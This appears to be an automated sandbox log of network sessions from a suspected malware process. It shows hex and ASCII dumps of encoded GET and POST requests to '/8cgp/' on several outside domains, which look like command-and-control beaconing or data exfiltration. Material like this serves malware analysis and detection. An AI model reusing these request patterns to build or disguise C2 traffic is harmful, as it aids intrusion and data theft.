                                                                    Data Ascii: MlXbtfYZIh3LLV929dm1WSKL36/iBG08LBR1aYuzXBnNEKV/iN2F2WgNWd8qsLEP87OAsfSfilS7/YCo3UXbRvt8tVrHTIq6ZOAAJ/ZkEn57vaWolra88S36wGz6P8T6ZixGy0ZVcwuB81/xfRVYzeA3oy6ys/NNIlC7XFDlRUaDtcJCCgf1vFgB+HGPBOysJxFYssAIbQvKd7mrvjJQ9HZ38f2aAl6Fm9qoUTYJfH3F23miSZq
                                                                    Apr 24, 2024 12:30:46.021760941 CEST5156OUTData Raw: 66 31 55 4a 6c 71 43 66 43 69 35 35 6d 63 4b 69 65 45 38 30 70 4f 63 6c 43 51 6f 36 6d 74 7a 4e 75 30 70 74 70 51 4d 6b 58 43 2b 69 38 54 66 6a 2f 5a 43 73 7a 50 4e 45 62 4e 36 47 47 53 47 75 4e 6c 2f 44 4f 6e 78 31 6e 32 41 57 30 43 63 4b 4e 53
                                                                    Data Ascii: f1UJlqCfCi55mcKieE80pOclCQo6mtzNu0ptpQMkXC+i8Tfj/ZCszPNEbN6GGSGuNl/DOnx1n2AW0CcKNSw6e+TAu6RBySGVli94ssrGa1qsezvYU4fWtxYFSbHOpBnpmjzbDGH4g37t+pEMssz9MkECzKyzsRGH/xvaZ9aTInabLxSHymw/XxW1fodKDZBJqaqgno+au37l0GQxFrP6uNIq3jw6vMv39H2k4aBwEQP5GlmrOan
                                                                    Apr 24, 2024 12:30:46.332530975 CEST2578OUTData Raw: 7a 6b 5a 77 48 57 42 75 65 42 76 4c 39 42 46 6e 31 4b 58 67 4b 42 6f 46 44 44 32 56 4f 31 35 59 35 6e 62 78 54 72 64 70 54 44 4b 6d 63 75 4e 56 2f 46 51 47 4c 61 46 35 58 41 61 34 56 2b 77 72 42 62 6c 4b 6e 39 30 50 52 59 6a 34 72 71 65 58 78 73
                                                                    Data Ascii: zkZwHWBueBvL9BFn1KXgKBoFDD2VO15Y5nbxTrdpTDKmcuNV/FQGLaF5XAa4V+wrBblKn90PRYj4rqeXxszbEIbbpzX4JJKCmPkS9wb+fFiEDUt79F2J1s2TNbO/eiOuHnhCKRIZN16JH9+QZaaaRuBhp2CA/cenByIpSV9vhiny77/+mifAS9xYSzsB06Pgp/0HjyhW6gS4tA02O+ATjE9qq5XvFL0YcVGqKD/y0TxLJ+K7qBJ
                                                                    Apr 24, 2024 12:30:46.332577944 CEST6445OUTData Raw: 69 4f 47 48 4a 37 42 45 2b 49 45 47 6d 61 39 48 64 47 6d 43 46 32 38 74 51 4e 42 4d 4e 63 2f 41 42 49 46 66 67 55 58 30 67 5a 4c 6c 54 57 46 4d 64 62 61 36 32 6b 39 54 74 33 2f 73 43 59 4f 53 33 79 62 4e 70 5a 44 72 67 79 6a 53 53 58 53 31 42 31
                                                                    Data Ascii: iOGHJ7BE+IEGma9HdGmCF28tQNBMNc/ABIFfgUX0gZLlTWFMdba62k9Tt3/sCYOS3ybNpZDrgyjSSXS1B1QeRtzUrz6slqoUbrtCYfYAjB2foWXTWqnWpRNhv8R/rX+ouFkw2fpABFrNBrJSHCAetb0p39SQwoyS+OayM2Lg5cEYNA2hq7n6pXyIzmilwlPQ9rGZV32TuLsq8QR641J0d8TJOF48wC4YPQotn7yITIVAULbRYo2
                                                                    Apr 24, 2024 12:30:46.332634926 CEST6445OUTData Raw: 61 66 6e 73 48 56 67 61 72 59 44 62 54 76 35 45 6f 71 31 42 4e 37 64 55 4a 6a 38 4f 59 55 66 73 69 4e 61 4d 77 4d 2f 71 33 6b 39 33 6a 31 35 67 52 59 39 42 50 56 6c 6f 68 66 37 74 63 4a 4c 6c 53 32 2f 34 6e 63 6c 36 55 71 4b 46 58 36 79 53 39 57
                                                                    Data Ascii: afnsHVgarYDbTv5Eoq1BN7dUJj8OYUfsiNaMwM/q3k93j15gRY9BPVlohf7tcJLlS2/4ncl6UqKFX6yS9WNWQl78pYbM6l4ljl0hNfnxKD+JBS4NR83n5DK2fUlRdkaczVhjzYk3Cjj8O/+5B3X2IQoS5G01jPXz4yjGl1bsPjTc7QZgZ096pOjtRNzhikveYuzH8uqhYBQZlSDe1b37WOooHqi1ERrpGUbs8TiWZrL3Qwg4bWO
                                                                    Apr 24, 2024 12:30:46.332806110 CEST9023OUTData Raw: 77 6b 76 49 61 49 58 74 42 73 63 5a 49 64 6a 31 6c 6b 42 37 41 51 32 72 52 66 49 46 44 61 67 6f 35 51 6c 57 76 74 4e 46 78 2f 78 4f 4b 5a 71 49 69 43 42 35 2b 35 4b 57 79 43 4e 53 50 65 35 44 30 64 64 66 31 56 79 63 53 74 6b 4e 4c 52 49 49 62 48
                                                                    Data Ascii: wkvIaIXtBscZIdj1lkB7AQ2rRfIFDago5QlWvtNFx/xOKZqIiCB5+5KWyCNSPe5D0ddf1VycStkNLRIIbHebufg3BqvGbm89XBIabwrz1ZPOHKPMmUFThbwJv6qWXZx5d5/Zv14iKChjJJBFThZ9f6cPMQ/ptDjSu72IHPna7uPWEalyPmOr6blBTu51SEcYPuwdBgAYBVDFODgParrzNrJvhWwPXgMxvU66zYFdxxGF5Shw7Gr
                                                                    Apr 24, 2024 12:30:46.333102942 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:46 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                    Apr 24, 2024 12:30:46.642946005 CEST1289OUTData Raw: 41 50 39 71 6c 44 70 62 64 57 56 54 56 2b 45 4a 33 71 37 4b 65 35 53 54 71 76 67 6f 62 45 4a 6a 77 45 42 53 6b 4f 62 30 66 38 58 52 50 47 74 46 6b 51 6d 48 4d 73 6b 57 45 74 51 4a 52 31 33 59 48 49 49 44 75 49 70 50 42 76 66 4b 35 59 43 62 41 4b
                                                                    Data Ascii: AP9qlDpbdWVTV+EJ3q7Ke5STqvgobEJjwEBSkOb0f8XRPGtFkQmHMskWEtQJR13YHIIDuIpPBvfK5YCbAK/6IXT/Xhg9Dk59akdZp7mGOuOg31VxNFbox+C1CpCT9D4rIxhShsC6zeWV6bsyG2oHbCWfIVMHz8pKsfQqDA3HId103bF8Ba1mm6UblcPpzXkgXAZw+zkkvANFHCpOjW99BFned0ZbJtQvpYjqPJ/clhfVT8ti5tE
                                                                    Apr 24, 2024 12:30:46.643014908 CEST3867OUTData Raw: 6a 78 44 6e 38 6d 4b 48 63 45 50 67 78 56 72 47 77 35 68 31 42 39 67 33 65 68 39 4c 33 70 63 4e 6c 75 6e 47 4b 55 33 51 2b 48 33 65 59 63 34 66 39 36 47 61 4b 46 78 4b 65 4b 42 4a 49 4c 4b 74 55 47 53 44 76 4e 72 72 6b 75 4f 63 70 46 45 78 6c 2b
                                                                    Data Ascii: jxDn8mKHcEPgxVrGw5h1B9g3eh9L3pcNlunGKU3Q+H3eYc4f96GaKFxKeKBJILKtUGSDvNrrkuOcpFExl+1a5LOaqgygF8mEeJDDDiToP8oVigPG36WfyMvvh4NGGJXHG0DpDxyew7P91qXS9IdoeGxZ8VngAfBqQgjwZhDLEizdR87HScZqr5UPZAwxt2uDXsx9Q4u88agahBeiRZxb7Z6ukGCS8veTrA7evyb53DS0Hzefvdo
                                                                    Apr 24, 2024 12:30:46.643234968 CEST10859OUTData Raw: 63 73 38 51 32 56 33 48 67 41 4e 46 69 45 49 7a 59 4b 38 34 4c 57 6d 78 66 71 49 62 74 66 65 6c 33 4a 52 5a 50 6a 77 4e 6d 75 4b 52 4d 4b 33 32 5a 38 47 34 46 71 37 53 36 2f 72 32 46 30 4e 77 44 66 2f 6b 6e 77 73 50 2f 6c 4f 42 69 46 34 62 64 67
                                                                    Data Ascii: cs8Q2V3HgANFiEIzYK84LWmxfqIbtfel3JRZPjwNmuKRMK32Z8G4Fq7S6/r2F0NwDf/knwsP/lOBiF4bdgjzuN2eii6oUAWNiiE1wGreFWNRDQ92ZWlNKOFeSL737AnBJeDja4aasaT77ykiqXW/vv9TXb9wJRRCLZ8nlUir+3BQmxtui5PyxSdxhDd7Fi/NX0CuVMIsHZeR2unlEjPHnsxxOnMnwRD9XQ5Bto3wNqKCH1Q34SM


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.11.205028191.195.240.19807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:48.864064932 CEST389OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=gPmRQJtWqOniEM4QRYssNN1Z+6d7UeIsnmjN3YDy8B2ChygMtzhOiKO2U7rNAXgtrRM7pNM3lf9QxBLsAyZPQtIaU4REtcvgBDtZA8Dv/AhV5YtMj725a40= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.nurenose.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:30:49.435338020 CEST1289INHTTP/1.1 200 OK
                                                                    date: Wed, 24 Apr 2024 10:30:49 GMT
                                                                    content-type: text/html; charset=UTF-8
                                                                    transfer-encoding: chunked
                                                                    vary: Accept-Encoding
                                                                    x-powered-by: PHP/8.1.17
                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    pragma: no-cache
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_e8FT9kDHiyn9HlZslDLOcIZbVsAZx2Cism98LBpbY6Feesf/xsj7Mn9GTsh2HlprLFQkIIYE/Ra0gUT0Raubng==
                                                                    last-modified: Wed, 24 Apr 2024 10:30:49 GMT
                                                                    x-cache-miss-from: parking-55fd589654-8mkkq
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 65 38 46 54 39 6b 44 48 69 79 6e 39 48 6c 5a 73 6c 44 4c 4f 63 49 5a 62 56 73 41 5a 78 32 43 69 73 6d 39 38 4c 42 70 62 59 36 46 65 65 73 66 2f 78 73 6a 37 4d 6e 39 47 54 73 68 32 48 6c 70 72 4c 46 51 6b 49 49 59 45 2f 52 61 30 67 55 54 30 52 61 75 62 6e 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6e 75 72 65 6e 6f 73 65 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6e 75 72 65 6e 6f 73 65 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 75 72 65 6e 6f 73 65 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69
                                                                    Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_e8FT9kDHiyn9HlZslDLOcIZbVsAZx2Cism98LBpbY6Feesf/xsj7Mn9GTsh2HlprLFQkIIYE/Ra0gUT0Raubng==><head><meta charset="utf-8"><title>nurenose.com&nbsp;-&nbsp;nurenose Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="nurenose.com is your first and best source for all of the information youre looking for. From general topi
                                                                    Apr 24, 2024 12:30:49.435353041 CEST1289INData Raw: 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6e 75 72 65 6e 6f 73 65 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 6f 70 65
                                                                    Data Ascii: cs to more of what you would expect to find here, nurenose.com has it all. We hope you find what you are595 searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png
                                                                    Apr 24, 2024 12:30:49.435432911 CEST1289INData Raw: 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61
                                                                    Data Ascii: optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-mo
                                                                    Apr 24, 2024 12:30:49.435444117 CEST1289INData Raw: 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b
                                                                    Data Ascii: 62e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-bu
                                                                    Apr 24, 2024 12:30:49.435455084 CEST1289INData Raw: 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74 65 78 74 2d
                                                                    Data Ascii: ner-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#94
                                                                    Apr 24, 2024 12:30:49.435466051 CEST1289INData Raw: 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 25 3b 6d 61
                                                                    Data Ascii: n:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-wi
                                                                    Apr 24, 2024 12:30:49.435511112 CEST698INData Raw: 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39
                                                                    Data Ascii: f;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:
                                                                    Apr 24, 2024 12:30:49.435595989 CEST1289INData Raw: 37 33 41 0d 0a 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 66
                                                                    Data Ascii: 73Ader-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:
                                                                    Apr 24, 2024 12:30:49.435605049 CEST568INData Raw: 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2d 63 75 72 76 65 64 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65
                                                                    Data Ascii: ght{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);
                                                                    Apr 24, 2024 12:30:49.435667992 CEST1289INData Raw: 35 37 31 0d 0a 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61
                                                                    Data Ascii: 571iner-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list
                                                                    Apr 24, 2024 12:30:49.745836973 CEST1289INData Raw: 2d 65 6c 65 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b
                                                                    Data Ascii: -element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size105B:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:non


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.11.205028291.195.240.123807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:55.275985956 CEST647OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.lm2ue.us
                                                                    Origin: http://www.lm2ue.us
                                                                    Referer: http://www.lm2ue.us/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 43 46 31 56 36 78 4b 5a 46 2b 62 62 6d 75 41 2b 74 62 63 74 2b 77 70 77 37 33 4b 58 73 32 6b 6c 6a 70 4d 5a 69 47 36 79 5a 47 33 6c 50 36 4a 48 64 43 6a 7a 5a 51 78 44 52 55 4c 43 78 70 2f 6d 49 52 74 4a 34 33 50 52 47 55 4e 39 37 65 56 64 35 55 4a 62 48 55 30 5a 6d 43 4a 4e 64 6e 6c 45 49 57 55 58 48 6c 56 58 47 4b 36 76 32 62 74 66 74 4f 64 72 33 32 7a 32 61 70 39 6c 6c 34 58 4e 31 4e 4e 33 64 30 45 65 46 59 61 44 5a 72 67 35 75 77 39 69 4d 41 77 49 52 32 2f 38 50 79 51 71 49 71 51 65 7a 56 50 50 69 4f 39 6b 43 65 4c 46 34 38 36 74 77 75 41 69 61 33 34 76 37 6f 4a 78 6d 41 3d 3d
                                                                    Data Ascii: Xh9lX=CF1V6xKZF+bbmuA+tbct+wpw73KXs2kljpMZiG6yZG3lP6JHdCjzZQxDRULCxp/mIRtJ43PRGUN97eVd5UJbHU0ZmCJNdnlEIWUXHlVXGK6v2btftOdr32z2ap9ll4XN1NN3d0EeFYaDZrg5uw9iMAwIR2/8PyQqIqQezVPPiO9kCeLF486twuAia34v7oJxmA==
                                                                    Apr 24, 2024 12:30:55.589925051 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:55 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.11.205028391.195.240.123807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:58.112905025 CEST987OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.lm2ue.us
                                                                    Origin: http://www.lm2ue.us
                                                                    Referer: http://www.lm2ue.us/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 43 46 31 56 36 78 4b 5a 46 2b 62 62 6b 50 77 2b 76 38 67 74 34 51 70 7a 30 58 4b 58 69 6d 6b 70 6a 70 51 5a 69 44 4b 69 61 7a 76 6c 50 61 35 48 63 42 37 7a 61 51 78 44 62 30 4c 48 38 4a 2f 34 49 52 68 72 34 32 7a 52 47 55 5a 39 70 59 68 64 77 45 4a 59 49 45 30 61 6a 43 4a 49 4b 58 6c 65 49 57 4a 45 48 6b 78 58 47 36 57 76 31 64 35 66 71 66 64 6f 7a 57 79 39 63 70 39 36 2f 49 58 58 31 4e 78 4a 64 31 73 6f 46 4f 71 44 5a 4c 41 35 76 77 39 68 43 77 77 50 65 57 2b 72 66 42 42 63 48 70 5a 73 2f 46 72 55 71 62 68 54 59 4e 37 61 77 75 61 31 6b 39 4d 51 54 56 64 50 74 62 73 6b 36 4a 2f 4e 43 35 2b 55 67 4e 58 72 62 2b 33 30 44 42 61 64 39 58 5a 74 66 4b 38 63 31 37 34 4c 4e 64 75 75 62 6b 36 36 36 6b 33 33 7a 4b 56 65 6b 4b 42 51 31 6e 62 34 2f 74 78 43 44 50 70 45 66 46 67 78 7a 62 48 5a 39 61 66 67 41 71 72 34 64 34 44 4d 5a 77 6a 69 73 43 68 51 56 49 42 5a 53 61 49 45 63 5a 65 4d 62 6a 66 74 65 52 5a 6a 6a 77 67 4b 41 70 54 50 73 58 39 48 54 42 33 35 6a 78 30 2f 46 2b 74 64 2f 64 57 57 6d 61 55 31 73 78 62 51 65 7a 76 50 33 75 7a 4c 6b 74 53 56 74 6a 34 66 53 74 69 45 70 2f 5a 30 6b 54 6f 2f 74 4f 50 51 6c 36 6d 38 55 4e 46 4d 54 79 39 79 66 6d 46 45 63 66 66 6a 35 44 6f 46 57 32 34 45 50 6f 69 36 45 73 4a 49 70 4a 56 75 76 2b 6d 42 54 32 4d 6a 4c 6c 6e 36 4e 32 50 4a 71 47 48 6e 67 68 49 63 42 53 6b 7a 45 4b 6b 47 30 72 63 50 64 37 67 7a 73 36 4b 53 72 72 46 6e 43 58 33 45 54 47 71 4b 68 43 6b 4a 44 50 58 68 6c 77 6d 38 69 4e 36 70 51 45 77 4a 43 79 75 49 32 76 31 30 56 6d 5a 63 4f 56 6b 45 71 6c 72 66 68 46 41 45 7a 2f 4d 4d 65 61 53 7a 4f 56 64 37 38 4d 47 76 54 4f 71 63 38 66 38 3d
                                                                    Data Ascii: Xh9lX=CF1V6xKZF+bbkPw+v8gt4Qpz0XKXimkpjpQZiDKiazvlPa5HcB7zaQxDb0LH8J/4IRhr42zRGUZ9pYhdwEJYIE0ajCJIKXleIWJEHkxXG6Wv1d5fqfdozWy9cp96/IXX1NxJd1soFOqDZLA5vw9hCwwPeW+rfBBcHpZs/FrUqbhTYN7awua1k9MQTVdPtbsk6J/NC5+UgNXrb+30DBad9XZtfK8c174LNduubk666k33zKVekKBQ1nb4/txCDPpEfFgxzbHZ9afgAqr4d4DMZwjisChQVIBZSaIEcZeMbjfteRZjjwgKApTPsX9HTB35jx0/F+td/dWWmaU1sxbQezvP3uzLktSVtj4fStiEp/Z0kTo/tOPQl6m8UNFMTy9yfmFEcffj5DoFW24EPoi6EsJIpJVuv+mBT2MjLln6N2PJqGHnghIcBSkzEKkG0rcPd7gzs6KSrrFnCX3ETGqKhCkJDPXhlwm8iN6pQEwJCyuI2v10VmZcOVkEqlrfhFAEz/MMeaSzOVd78MGvTOqc8f8=
                                                                    Apr 24, 2024 12:30:58.423721075 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:30:58 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
